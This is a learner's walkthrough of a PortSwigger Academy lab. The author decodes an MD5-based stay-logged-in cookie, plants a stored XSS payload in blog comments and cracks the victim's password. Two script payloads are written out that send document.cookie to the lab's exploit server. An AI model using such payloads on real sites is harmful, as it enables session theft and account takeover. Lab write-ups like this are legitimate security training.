PortSwigger Academy: Offline password cracking
Task
This lab stores the user’s password hash in a cookie. The lab also contains an XSS vulnerability in the comment functionality. To solve the lab, obtain Carlos’s stay-logged-in cookie and use it to crack his password. Then, log in as carlos and delete his account from the “My account” page.
- Your credentials:
wiener:peter - Victim’s username:
carlos
Attempt
First let’s just log in to the website as usual and take a gander at requests. oh there’s a stay logged in button. Promising. I checked it. You can see a delete account button and this time’s goal is deleting carlos’s account using this button.
Turn on intercept and intercept the request to delete the account. (You gotta drop this request otherwise you will lose your account. and do not send that cookie as the baseline request!) Upon examining the request I can see a stay-logged-in cookie and session token. The path doesn’t specify the user so this stay-logged-in cookie must hold the info of a specific user.
Since the account deletion page requires entering your password again, I chose to attack /my-account?id= page.
I just selected that cookie value and burp showed the base64 decoded string: wiener:51dc30ddc473d43a6011e9ebba6ca770. I guessed the 2nd part is a MD5 hashed password.
I tried this:
echo -n "peter" | md5sum
(this -n option is important when dealing with hashing because it makes sure to delete any trailing spaces that might alter the hash result)
echo -n "peter" | md5sum
51dc30ddc473d43a6011e9ebba6ca770
Bingo.
I added a list of passwords to Intruder. And as payload processing rules, add MD5, add prefix carlos and base64 encode. The order is crucial.
I changed the redirection setting to on-site only and add Your username is to grep match so it tells when I successfully log in I can easily tell it.
But any of passwords in my list was correct.
I guess there’s no other way than stealing the cookie.
Since the blog comment section is vulnerable to stored xss, you can set the payload to steal cookies:
<script>document.location='https://exploit-0af700d604665a5780fa6b7d01ee008a.exploit-server.net/'+document.cookie</script>
You could use a more modern payload:
<script>
fetch('https://exploit-0af700d604665a5780fa6b7d01ee008a.exploit-server.net/log?c=' + encodeURIComponent(document.cookie));
</script>
I got this:
secret=cDAWpO1SC2FjkbVSyPU8fkQ7ayw5B4xL;%20stay-logged-in=Y2FybG9zOjI2MzIzYzE2ZDVmNGRhYmZmM2JiMTM2ZjI0NjBhOTQz
based64 decoded:
carlos:26323c16d5f4dabff3bb136f2460a943
I failed to install hashcat to my new laptop so I used crackstation. You should avoid using this kind of online service if you work with a client. I got a de-hashed password.
onceuponatime
Deleting poor carlos acccount concludes the lab.